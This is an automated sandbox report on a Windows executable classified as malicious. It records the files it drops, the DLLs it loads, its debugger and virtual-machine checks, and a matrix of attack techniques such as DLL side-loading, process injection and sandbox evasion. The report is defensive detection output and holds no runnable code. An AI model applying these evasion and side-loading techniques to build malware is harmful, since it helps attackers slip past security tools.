Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EE1E800_2_00EE1E80
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: String function: 00EDA640 appears 52 times
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040
Source: LisectAVT_2403002B_246.exeStatic PE information: invalid certificate
Source: LisectAVT_2403002B_246.exeStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWABMIG.EXEj% vs LisectAVT_2403002B_246.exe
Source: LisectAVT_2403002B_246.exeBinary or memory string: OriginalFilenameWABMIG.EXEj% vs LisectAVT_2403002B_246.exe
Source: LisectAVT_2403002B_246.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal68.winEXE@3/18@3/3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\EverythingJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7328
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\60a2b6bd-7a18-44fc-9b0c-3365f4b865edJump to behavior
Source: LisectAVT_2403002B_246.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe "C:\Users\user\Desktop\LisectAVT_2403002B_246.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LisectAVT_2403002B_246.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LisectAVT_2403002B_246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wabmig.pdbGCTL source: LisectAVT_2403002B_246.exe
Source: Binary string: wabmig.pdb source: LisectAVT_2403002B_246.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: C:\Users\Administrator\source\repos\MSASN1\Release\MSASN1.pdb source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.000000000064C000.00000004.00000020.00020000.00000000.sdmp, app_core_legacy.dll.0.dr, MSASN1[1].dll.0.dr
Source: LisectAVT_2403002B_246.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_246.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_246.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_246.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_246.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: msvcp140.dll.0.drStatic PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA163 push ecx; ret 0_2_00EDA176
Source: msvcr120[1].dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\Everything.exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\app_core_legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeFile created: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\Everything.exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\app_core_legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe TID: 7332Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EEDEE2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EEDEE2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeThread delayed: delay time: 30000Jump to behavior
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EE1021 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EE1021
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EF1718 GetProcessHeap,0_2_00EF1718
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EE1021 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EE1021
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EDA417
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA57A SetUnhandledExceptionFilter,0_2_00EDA57A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA862 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00EDA862
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA685 cpuid 0_2_00EDA685
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetLocaleInfoW,0_2_00EF11B6
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00EF12DF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetLocaleInfoW,0_2_00EF13E5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00EF14BB
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: EnumSystemLocalesW,0_2_00EE78F9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: EnumSystemLocalesW,0_2_00EF0DF2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: EnumSystemLocalesW,0_2_00EF0DF0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: EnumSystemLocalesW,0_2_00EF0ED8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetLocaleInfoW,0_2_00EE7E25
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: EnumSystemLocalesW,0_2_00EF0E3D
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00EF0F63
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDA307 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EDA307
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
2
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager41
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
